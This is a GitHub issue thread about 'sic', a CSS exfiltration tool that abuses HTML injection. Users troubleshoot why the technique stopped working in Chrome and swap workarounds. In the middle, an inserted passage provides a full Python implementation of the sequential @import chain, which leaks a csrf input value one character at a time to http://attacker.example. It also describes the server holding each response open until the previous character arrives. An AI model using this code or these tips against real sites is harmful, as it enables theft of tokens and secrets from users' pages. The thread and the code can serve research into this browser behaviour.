d0nutptr / sic

A tool to perform Sequential Import Chaining
https://medium.com/@d0nut/better-exfiltration-via-html-injection-31c72a2dae8b
MIT License

Still works? #7

Open ariary opened 2 years ago

ariary commented 2 years ago

Hi,

First, great article + finding + tool 😉 I tried to reuse it years later with different browsers (Firefox, Chrome). I did not succeed in making it work. As I struggle a bit with Rust I have not been able to modify the code as I wished (I wrote my own "clone" of your idea in Go; it works with a bot but not with my browsers).

So my question is simple: do you know if the trick still works? If yes, on which browser?

Thanks in advance

OsaAjani commented 2 years ago

Hi, I think we have the same problem @ariary. I've tried using sic and, for about the same reason as you, I've also written my own Python version of the tool, based on the same principles, but it does not work anymore apparently.

I will try to explain what I have observed so far in the hope that @d0nutptr could be of any help on this one. For information, I've been testing this on Ubuntu 20.04 & Chromium Version 102.0.5005.61

So, when I inject the entrypoint CSS sheet, the browser loads it just right, then it makes queries to all the /polling sheets, and then to the first two /callback addresses. But after that, it stalls. It's as if the browser stopped rendering the CSS or making the queries to callback.

Even stranger, if the developer console is open and I move the mouse over the page, then all the queries get fired just fine. Without the developer console, moving the mouse does nothing, but focusing/unfocusing the browser window does the same thing.

Here is a gif of this strange behavior: [gif: css_exfil]

I cannot manage to understand what exactly happens: whether the browser is not making the queries to the callback because too many connections are already open, or whether it is because the style is not refreshed somehow.

If someone can check whether this is still working, or even explain the browser behavior, that would be so nice.

Anyway, that really is a nice piece of exploit @d0nutptr!

ariary commented 2 years ago

Hi!

Thank you for sharing this with us! My adaptation works under certain circumstances but I can't determine which ones yet.

OsaAjani commented 2 years ago

I've just tested it, and I got exactly the same situation :/ Also, as I have come to take an interest in CSS exfil for the same reason as you :wink:, I've just tried it on the bot and it does not work either :/

Did you manage to find any reproducible situation where your version is working, so we can try to nail down what makes it fail in our context?

pilvar222 commented 2 years ago

Hey @OsaAjani! I recently had the exact same problem. I could fix it by placing the style tag after the input element. I can't explain why, but it worked for me. Hope it helps! :)

ariary commented 2 years ago

> Hey @OsaAjani! I recently had the exact same problem. I could fix it by placing the style tag after the input element. I can't explain why, but it worked for me. Hope it helps! :)

@pilvar222 How did you manage to do this? Did you test on a local app? Otherwise, you do not necessarily have control over the style tag injection location.

pilvar222 commented 2 years ago

> > Hey @OsaAjani! I recently had the exact same problem. I could fix it by placing the style tag after the input element. I can't explain why, but it worked for me. Hope it helps! :)
>
> @pilvar222 How did you manage to do this? Did you test on a local app? Otherwise, you do not necessarily have control over the style tag injection location.

I did try this on a local app where I had control over the style tag location. Unfortunately, I don't really see how you can do otherwise :/

pilvar222 commented 2 years ago

Also, I think Chrome now has some trouble with having lots of hanging requests. It seems like placing the @import for the next character in the previously imported CSS works better. If, like me, you're too bad at Rust to tweak the code, there's this simple Python script that does the job https://github.com/sudiptadeb/cssexfil
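
As an added example that is not from this thread, from sic, or from the linked cssexfil script: a self-contained Python simulation of the chained-@import layout described in the comment above. Each served stylesheet starts with the @import for the next character, and the server holds that one response until the callback for the current character arrives, so only a single request is ever hanging. The attacker origin (http://attacker.example), the input name csrf, the hex charset, the secret length and the secret itself are all assumptions made for the example; the simulated victim stands in for the browser and runs offline.

```python
"""Sequential import chaining for CSS-only exfiltration, simulated offline.

Assumptions (not from the issue thread): the victim page contains
<input name="csrf" value="...">, the attacker origin is http://attacker.example,
and the secret is drawn from a hex charset of known length."""
import re

ATTACKER = "http://attacker.example"   # hypothetical attacker origin
CHARSET = "0123456789abcdef"

# Parsers used by the simulated browser below.
IMPORT_RE = re.compile(r'@import url\("([^"]+)"\);')
SELECTOR_RE = re.compile(
    r'input\[name="(\w+)"\]\[value\^="([^"]*)"\]\{background:url\("([^"]+)"\)\}')


class ImportChain:
    """Attacker-side state: one stylesheet per recovered character."""

    def __init__(self, attr="csrf", charset=CHARSET, length=4):
        self.attr = attr
        self.charset = charset
        self.length = length
        self.known = ""            # prefix of the secret recovered so far

    def entry_stylesheet(self):
        """The injected payload: a single @import that starts the chain."""
        return f'@import url("{ATTACKER}/step?i=0");'

    def ready(self, i):
        """The handler for /step?i=<i> must hold its response until the
        callback for step i-1 has arrived, i.e. until i characters are known."""
        return len(self.known) == i

    def step_stylesheet(self, i):
        """CSS served for /step?i=<i>: the @import for the next step comes
        first (imports must precede other rules), then one attribute selector
        per candidate character. Only the selector whose prefix matches the
        input's value makes the browser fetch its background URL."""
        if not self.ready(i):
            raise ValueError(f"step {i} requested before step {i - 1} resolved")
        rules = []
        if i + 1 < self.length:
            rules.append(f'@import url("{ATTACKER}/step?i={i + 1}");')
        for c in self.charset:
            guess = self.known + c
            rules.append(
                f'input[name="{self.attr}"][value^="{guess}"]'
                f'{{background:url("{ATTACKER}/cb?t={guess}")}}')
        return "\n".join(rules)

    def callback(self, token):
        """Handler for /cb?t=<token>: the browser fetched this URL, so the
        selector matched and the known prefix grows by one character."""
        if len(token) != len(self.known) + 1 or not token.startswith(self.known):
            raise ValueError(f"unexpected token {token!r}")
        self.known = token
        return self.known


def simulate_victim(chain, secret, attr="csrf"):
    """Model of the browser: load the entry sheet, follow each @import,
    evaluate the attribute selectors against <input name=attr value=secret>
    and 'fetch' the matching background URL. Returns the attacker's view."""
    css = chain.entry_stylesheet()
    while (m := IMPORT_RE.search(css)):
        step = int(m.group(1).rsplit("=", 1)[1])
        # A real browser issues this request as soon as it parses the @import;
        # the server blocks it until the previous callback lands, which is the
        # ordering this sequential simulation reproduces.
        css = chain.step_stylesheet(step)
        for name, guess, url in SELECTOR_RE.findall(css):
            if name == attr and secret.startswith(guess):
                chain.callback(url.rsplit("=", 1)[1])
    return chain.known


if __name__ == "__main__":
    # Constructed secret; the attacker learns it one character per round trip.
    print(simulate_victim(ImportChain(length=4), "beef"))
```

In a real deployment step_stylesheet sits behind an HTTP handler that waits on ready(i) before writing the body, and the chain simply ends when no selector matches, which is also what a page with a non-matching selector or a stripped attribute looks like from the attacker's side.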

Jesse-0x commented 4 weeks ago

Hi there, I had run into a similar issue before. This situation will also happen when your selector can't select anything. If you are working with nonces, Google Chrome (and other browsers) will delete the nonce inside the actual DOM for safety reasons. https://stackoverflow.com/questions/55670985/google-chrome-stripping-nonce-values-from-script-tags